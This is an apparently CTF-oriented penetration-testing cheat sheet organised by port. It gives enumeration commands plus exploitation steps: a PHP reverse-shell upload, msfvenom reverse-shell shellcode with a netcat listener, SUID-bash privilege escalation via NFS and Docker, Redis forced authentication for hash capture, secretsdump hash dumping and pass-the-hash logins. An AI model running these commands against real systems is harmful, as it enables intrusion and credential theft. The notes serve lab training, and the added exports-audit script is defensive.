Enumeration
Scans
Initial scan
Kali
nmap -A $VICTIM
Longer scan
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
Even longer scan
Kali
nmap -sC -sV -p- $VICTIM
Scan for vulnerabilities
Change the port list to the ports found in the previous scans.
Kali
nmap -p1,2,3,4 --script=vuln $VICTIM
Ports
TCP/21 - FTP
Common Credentials
Usernames
anonymous
admin
guest
Passwords
anonymous
password
guest
Access FTP
Kali
ftp $VICTIM 21
List files
Kali(ftp)
ls
List files (using Curl)
Kali
curl ftp://anonymous:anonymous@$VICTIM:21
Download files
Switch to binary mode and passive mode first (an important setting if you're uploading or downloading binary files such as pictures or executables).
Kali(ftp)
binary
passive
Kali(ftp)
get $fileName.txt
Download all files
Kali(ftp)
mget *
Download all files to the current directory (using Wget)
Kali
wget -m ftp://anonymous:anonymous@$VICTIM:21 -nd
Upload files
If there is also a website being hosted and you can see its web root in the FTP listing, try adding a webshell and opening it from the browser.
Kali(ftp)
binary
passive
put php-reverse-shell.php
TCP/22 - SSH
SSH into host
Kali
ssh $USERNAME@$VICTIM
# SSH into a non-standard port
ssh $USERNAME@$VICTIM -p2222
Check this page for cracking examples
TCP/25 - SMTP
Kali
telnet $VICTIM 25
HELO
VRFY root
QUIT
Kali
sudo nmap $VICTIM -p25 --script smtp-commands
Kali
# quote the braces, otherwise the shell brace-expands them into three separate arguments
sudo nmap $VICTIM -p25 --script smtp-enum-users --script-args 'smtp-enum-users.methods={VRFY,EXPN,RCPT}'
Kali
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $VICTIM
Check for vulnerabilities
Kali
sudo nmap $VICTIM -p25 --script 'smtp-vuln*'
Check this page for cracking examples
UDP/53 - DNS
Find subdomains
Examples: DNS, SMB, and SNMP; UDP/53 - DNS
Kali
dig -t AXFR $HOST.thm @$DNSSERVER
TCP/80:443 - HTTP(s)
Web Enumeration
Useful info on how to run a lot of the tools in this section.
Info gathering
Check if any pages are listed in:
http://$VICTIM/robots.txt
http://$VICTIM/sitemap.xml
Check the TLS certificate for a hostname, then add it to the hosts file.
Create wordlist
Create a wordlist from the words that appear on the website.
Kali
cewl -m 8 -w $LIST.lst https://$VICTIM
Find Directories
Kali
ffuf -u http://$VICTIM/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
Kali
dirb http://$VICTIM/
dirb http://$VICTIM:$PORT/
dirb http://$VICTIM:80 /usr/share/wordlists/dirb/big.txt -z10
Find Pages
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Kali
gobuster dir --url http://$VICTIM/ -w /usr/share/dirb/wordlists/big.txt -l
Kali
ffuf -u http://$VICTIM/static/FUZZ -w /usr/share/dirb/wordlists/big.txt
Kali
dirsearch -u $VICTIM:$PORT
Find pages with certain extensions
Kali
head /usr/share/wordlists/SecLists/Discovery/Web-Content/web-extensions.txt
.asp
.aspx
.bat
.c
.cfm
.cgi
.css
.com
.dll
.exe
Kali
ffuf -u http://$VICTIM/indexFUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/web-extensions.txt
Find pages and exclude certain extensions
Kali
ffuf -u http://$VICTIM/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-
Using filters
By adding -fc 403 (filter code) we hide every response with HTTP status 403 from the output.
Kali
ffuf -u http://$VICTIM/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt -fc 403
Use -mc 200 (match code) instead of maintaining a long list of filtered codes.
Kali
ffuf -u http://$VICTIM/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt -mc 200
We can use a regexp (-fr, filter regexp) to filter out everything beginning with a dot.
Kali
ffuf -u http://$VICTIM/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt -fr '/\..*'
Fuzzing parameters
ffuf lets you put the FUZZ keyword anywhere in the request, so we can use it to fuzz for parameter names.
Kali
# quote the URL so the shell does not treat ? and = as globbing characters
ffuf -u "http://$VICTIM/sqli-labs/Less-1/?FUZZ=1" -c -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-words-lowercase.txt -fw 39
Find Vulnerabilities
Nikto Tuning (-T) Options
0 - File Upload
1 - Interesting File / Seen in logs
2 - Misconfiguration / Default File
3 - Information Disclosure
4 - Injection (XSS/Script/HTML)
5 - Remote File Retrieval - Inside Web Root
6 - Denial of Service
7 - Remote File Retrieval - Server Wide
8 - Command Execution / Remote Shell
9 - SQL Injection
a - Authentication Bypass
b - Software Identification
c - Remote Source Inclusion
x - Reverse Tuning Options (i.e., include all except the specified ones)
Scan for misconfigurations
Kali
# -Format sets the format of the -o output file
nikto -h $VICTIM -T 2 -Format txt -o nikto-misconfig.txt
Scan for SQL injection vulnerabilities
Kali
nikto -h $VICTIM -T 9 -Format txt -o nikto-sqli.txt
Authenticated nikto scan
Kali
nikto -id $USERNAME:$PASSWORD -h http://$VICTIM:80/manager/html
Check for Shellshock
Kali
nmap -p 80 $VICTIM --script http-shellshock
Check for Heartbleed
Kali
nmap -p 443 $VICTIM --script ssl-heartbleed
Fuzzing Subdomains
Kali
# double quotes so $URL expands; single quotes would pass it literally
wfuzz -c -f sub-fighter -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u "http://$URL.thm/" -H "Host: FUZZ.$URL.thm" > results.txt
# hide the responses with the baseline word count (290 W in this case)
grep -v '290 W' results.txt
Kali
gobuster vhost -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://$URL.thm
Kali
ffuf -u http://FUZZ.$URL.thm -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
Proxifying ffuf traffic
Kali
ffuf -u http://$VICTIM -c -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -x http://127.0.0.1:8080
It's also possible to send only the matches to your proxy for replaying:
Kali
ffuf -u http://$VICTIM -c -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -replay-proxy http://127.0.0.1:8080
SQLMap
Get information
Can be used to get things like usernames and passwords or other information from the tables.
Kali
sqlmap -u http://$VICTIM/$PAGE.php --forms --dump
OR
sqlmap -r request.txt --dbms=mysql --dump  # request.txt is the raw request saved from Burp
Get Databases
First capture the request of the page with Burp.
Kali
sudo sqlmap -r request.req --dbs
Get tables
Kali
# -D selects the database (--current-db takes no argument; it only prints the current one)
sudo sqlmap -r request.req -D $DATABASE --tables
Get fields for specified table
Kali
sudo sqlmap -r request.req -D $DATABASE -T $TABLE --columns
Get values of specific fields
Kali
sudo sqlmap -r request.req -D $DATABASE -T $TABLE -C $FIELD1,$FIELD2 --dump
Rescan SQLMap
SQLMap caches its results, so it will keep returning the same output for the same command even if the target has changed. Remove the cache to resolve this.
Kali
rm -rf /root/.sqlmap/output/$HOST.thm/
# newer sqlmap versions keep the cache under ~/.local/share/sqlmap/output/ instead
Cookies
Get the flag with the developer console by checking the cookie.
HTTP Headers
Run Web server
Kali
python2 -m SimpleHTTPServer 81
Wordpress
Scan wordpress site
Kali
# HTTP
wpscan --url http://$VICTIM
# HTTPS
wpscan --url https://$VICTIM --disable-tls-checks
Enumerate wordpress site
Examples: Retro; Wordpress: CVE-2021-29447
Kali
wpscan --url http://$VICTIM -e p,t,u
Bruteforce admin page
Kali
wpscan --url http://$VICTIM --passwords /usr/share/wordlists/rockyou.txt
.git folder found
Kali
pip install git-dumper
mkdir git
git-dumper https://$VICTIM/sources/new/.git/ git/
cd git
git log
grep -r pass *
Jenkins
Reverse Shell
UDP/88 - Kerberos
Username Enumeration
Finds valid users
Kali
kerbrute/dist/kerbrute_linux_386 userenum --dc=$VICTIM -d=$commonName $ListOfUsernames.txt
Get Ticket
The hash type is Kerberos 5 etype 23 AS-REP.
Kali
# the target is given as DOMAIN/ (note the trailing slash), otherwise impacket complains that no domain was specified
python3.9 /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile validusers.txt -dc-ip $VICTIM $commonName/
TCP/110 - POP3
Logging in with credentials
Kali
telnet $VICTIM 110
USER root
PASS root
RETR 1  # change the number for each available message
QUIT
Check this page for cracking examples
TCP/135 - RPC
Kali
rpcclient -U '' -N $VICTIM  # -N: null session, no password prompt
Kali(rpcclient)
srvinfo
netshareenum  # prints the real file path of each share; good for accurate RCE
Login with credentials
Kali
python3.9 /opt/impacket/build/scripts-3.9/psexec.py $USER@$VICTIM
Password: $PASSWORD
TCP/139 - NetBIOS
Enumerate SMB
Kali
nmap $VICTIM --script='smb-enum*'
Kali
nbtscan $VICTIM
Kali
enum4linux $VICTIM
UDP/161 - SNMP
Collect Information
Kali
git clone https://gitlab.com/kalilinux/packages/snmpcheck.git
cd snmpcheck/
gem install snmp
chmod +x snmpcheck-1.9.rb
./snmpcheck-1.9.rb $VICTIM -c $COMMUNITYSTRING
TCP/389 - LDAP
Enumerating Active Directory
Breaching Active Directory
Exploiting Active Directory
Persisting Active Directory
TCP/445 - SMB
Scanning
Kali
nmap $VICTIM --script='smb-enum*'
Common Credentials
Usernames
anonymous
admin
guest
Kali
smbclient -L //$VICTIM/ -U $USERNAME
List Shares
Option #1
Examples: Gatekeeper; Attacktive Directory; Basic Pentesting
Kali
smbclient -L //$VICTIM/
# List shares on a non-standard SMB/Samba port
smbclient -L //$VICTIM/ -p $PORT
Option #2
Victim
net share
Download files
Option #1
Kali
smbclient \\\\$VICTIM\\$SHARE
Kali(smbclient)
prompt
mget *
Option #2
Kali
smbmap -H $VICTIM
smbmap -H $VICTIM -P $PORT
Option #3
Kali
smbget -R smb://$VICTIM/$SHARE
# Download from a non-standard SMB/Samba port
smbget -R smb://$VICTIM:$PORT/$SHARE
Upload files
Option #1
Kali
smbclient \\\\$VICTIM\\$SHARE
Kali(smbclient)
put $FILE
Detect Vulnerabilities
Kali
# Check if vulnerable to EternalBlue
sudo nmap $VICTIM -p445 --script smb-vuln-ms17-010
# Check if vulnerable to SambaCry
sudo nmap $VICTIM -p445 --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version
TCP/667 - IRC
Kali
irssi -c $VICTIM -p $PORT
TCP/873 - RSYNC
Check Modules
Kali
sudo nmap $VICTIM -p873 --script rsync-list-modules
List files
Kali
rsync --list-only rsync://$VICTIM
rsync --list-only rsync://$USERNAME@$VICTIM/$FOLDER
Password: $PASSWORD
Transfer files
Kali
rsync authorized_keys rsync://$USERNAME@$VICTIM/$FOLDER/.ssh/
Password: $PASSWORD
TCP/2049 - NFS
Kali
sudo nmap $VICTIM -p111 --script 'nfs*'
Mount drive
Kali
# This will hopefully list some exported folders
showmount -e $VICTIM
# Make a dir
mkdir /mnt/nfs
# /opt/conf is just an example; use what showmount printed
mount $VICTIM:/opt/conf /mnt/nfs
cd /mnt/nfs
Upload id_rsa key to log in
Kali
ssh-keygen -t rsa
cp ~/.ssh/id_rsa.pub authorized_keys
rsync authorized_keys rsync://rsync-connect@$VICTIM/files/sys-internal/.ssh/
Password: pass
ssh $USERNAME@$VICTIM
Create mount
Kali
sudo mkdir /mnt/FOO
# -o nolock: do not use NFS file locking (needed when the server runs no lock daemon)
sudo mount -t nfs $VICTIM:$SHARE /mnt/FOO -o nolock
Interesting loot to look for
- id_rsa from users' home directories
Privilege Escalation
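The walkthrough in this section relies on the NFS server exporting the share with no_root_squash, which is what lets the root-owned setuid file created on Kali keep its ownership on the server. The script below is an added example and not part of the original notes: it audits an exports file for that option and lists setuid files already present under a directory. The exports lines and /srv paths are constructed samples; on a real server point it at /etc/exports and at each exported directory.

```shell
#!/bin/sh
# Added example, not from the original notes: server-side checks for the NFS
# SUID trick. It needs an export with no_root_squash, so flag that option and
# list setuid files that already sit in the exported tree.

# Print each active (non-comment) exports line that sets no_root_squash,
# prefixed with its line number. $1 = exports file (default /etc/exports).
exports_without_root_squash() {
    awk '!/^[ \t]*#/ && /no_root_squash/ { print NR ": " $0 }' \
        "${1:-/etc/exports}"
}

# List regular files with the setuid bit under a directory, one "ls -ld"
# line each (owner, mode and path). $1 = directory, e.g. an exported path.
suid_files_under() {
    find "$1" -xdev -type f -perm -4000 -exec ls -ld {} \; 2>/dev/null
}

# Constructed sample exports file so the script runs offline. The first line
# is the weak setting; the second is the corrected form (root_squash is also
# the default when neither option is given). The commented line is ignored.
sample=$(mktemp)
printf '%s\n' \
    '/srv/share   10.0.0.0/24(rw,sync,no_root_squash)' \
    '/srv/public  10.0.0.0/24(rw,sync,root_squash)' \
    '# /srv/old   *(rw,no_root_squash)' > "$sample"
echo "exports that do not squash root:"
exports_without_root_squash "$sample"     # only the /srv/share line
rm -f "$sample"
echo "setuid files under /mnt/nfs (empty if nothing is mounted there):"
suid_files_under /mnt/nfs
```

suid_files_under works on any directory, so it can be pointed at each path listed in /etc/exports in turn.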
Example of how you can get a root shell. All commands except the last one are run on our Kali machine, where we control the permissions fully. Then we just run the exploit as the normal user we already have access to.
Kali
# Download exploit
wget https://github.com/polo-sec/writing/raw/master/Security%20Challenge%20Walkthroughs/Networks%202/bash
mv bash /mount/point
chown root /mount/point/bash
chmod u+s /mount/point/bash
Victim
# SSH in as the victim user and run the following
/mount/point/bash -p
TCP/3306 - SQL
Kali
# double quotes so $PASSWORD expands
mysql -u $USER -h $VICTIM -p"$PASSWORD"
Kali(mysql)
show databases;
use $DATABASE;
show tables;
select * from $TABLE;
TCP/3389 - RDP
Scan
Kali
sudo nmap $VICTIM -p3389 --script rdp-ntlm-info
Login to host
Kali
rdesktop -u $USERNAME $VICTIM
Kali
remmina
Kali
xfreerdp /u:$USERNAME /p:$PASSWORD /cert:ignore /v:$VICTIM /workarea +clipboard
Kali
xfreerdp +clipboard /u:"$USERNAME" /v:$VICTIM:3389 /size:1024x568 /smart-sizing:800x1200
Password: $PASSWORD
TCP/5000 - Docker Registry
Add the registry as insecure
Kali
subl /etc/docker/daemon.json
daemon.json
{
  "insecure-registries" : ["$VICTIM:5000"]
}
Kali
sudo systemctl stop docker
# Wait 30 seconds
sudo systemctl start docker
List repositories
Examples: The Docker Rodeo; TCP/5000 - Docker Registry; Umbrella
Kali
curl -s http://$VICTIM:5000/v2/_catalog
Get tags of a repository
Examples: The Docker Rodeo; TCP/5000 - Docker Registry; Umbrella
Kali
curl -s http://$VICTIM:5000/v2/$REPOSITORY/tags/list
Get manifests
Examples: The Docker Rodeo; TCP/5000 - Docker Registry; Umbrella
Inside the manifest we can find potential credentials.
Kali
curl -s http://$VICTIM:5000/v2/$REPOSITORY/manifests/latest
Download the Docker image to find info
Download the Docker image we are going to decompile, then inspect its layers with dive.
Kali
docker pull $VICTIM:5000/$REPOSITORY
docker images
dive $IMAGE_ID
Enter image
Kali
docker -H $VICTIM:5000 images
docker -H $VICTIM:5000 run -v /:/mnt --rm -it $REPOSITORY chroot /mnt sh
Uploading Malicious Docker Images
Examples: Vulnerability #3: Uploading Malicious Docker Images
Kali
docker pull
Docker file example
RCE via Exposed Docker Daemon
Examples: Vulnerability #4: RCE via Exposed Docker Daemon
Escape via Exposed Docker Daemon
Examples: Vulnerability #5: Escape via Exposed Docker Daemon
Shared Namespaces
Examples: Vulnerability #6: Shared Namespaces
Misconfigured Privileges
Examples: Vulnerability #7: Misconfigured Privileges (Deploy #2)
Privilege Escalation with 2 shells and host mount
If you have root inside a container that has a folder from the host mounted, and you have also escaped to the host as an unprivileged user with read access to that mounted folder, you can create a SUID bash in the mounted folder from inside the container and execute it from the host to escalate privileges.
Victim(root, inside the container)
find / -name "$FILE-BOTH-USERS-CAN-ACCESS"
cd /$FOLDER
cp /bin/bash .
chown root:root bash
chmod 4777 bash
Victim(claire-r, on the host)
find / -name "$FILE-BOTH-USERS-CAN-ACCESS"
cd /$FOLDER-FROM-BEFORE-MIGHT-BE-DIFF-LOCATION
./bash -p
TCP/5432 - Postgres
Kali
psql -U postgres -p 5437 -h $VICTIM  # try postgres:postgres
Kali(psql)
SELECT pg_ls_dir('/');
TCP/5985 - WinRM or wsman
See TCP/5986 - WinRM for WinRM information.
TCP/5986 - WinRM
Dump Hashes
Dump the hashes of other users if the user you have access to has the privileges to do so. If so, we can potentially use these hashes with evil-winrm to log in as those users.
Kali
python3 /usr/local/bin/secretsdump.py $DOMAIN/$USER:$PASSWORD@$VICTIM > allhashes.txt
# secretsdump lines look like user:rid:lmhash:nthash:::, so field 4 is the NT hash that evil-winrm -H expects
awk -F : '{print $1 ":" $4}' allhashes.txt | sort | uniq
Login with found username and password
Examples: Tampering With Unprivileged Accounts
Kali
evil-winrm -u $USER -p $PASSWORD -i $VICTIM
Login with found username and hash
Examples: Attacktive Directory; Windows Local Persistence
Kali
evil-winrm -i $VICTIM -u $VICTIMUSERNAME -H $FOUNDHASH
TCP/6379 - Redis
Kali
redis-cli -h $VICTIM -a "$PASSWORD"
Kali(redis-cli)
KEYS *
KEYS "$VALUE"
GET "$VALUE"
LRANGE "$VALUE" 0 -1  # whole list; indexes start at 0
Get Users hash
Kali(redis-cli)
config get *
Kali
responder -I ens5 -dvw
(You can write anything in place of "share"; the share does not need to exist.)
Kali(redis-cli)
eval "dofile('//$KALI/share')" 0
TCP/7070 - AnyConnect
Exploit: https://www.exploit-db.com/raw/49613
For the code above we just had to change the shellcode and ip variables.
Kali
msfvenom -p linux/x64/shell_reverse_tcp LHOST=$KALI LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode
Kali
nc -lvnp 4444
TCP/11211 - Memcache
Dump cache
Victim
cd /usr/share/memcached/scripts/
./memcached-tool localhost:11211 dump
TCP/27017 - MongoDB
Find Info in DB
Victim
mongo
Victim(mongo)
show dbs
use $DBSNAME
show collections
db.$COLLECTION.find();
exit
Knock
Usually used in CTFs. Knock on certain ports in a certain pattern to open up more ports.
Kali
git clone https://github.com/grongor/knock.git
cd knock
./knock $VICTIM 42 1337 10420 6969 63000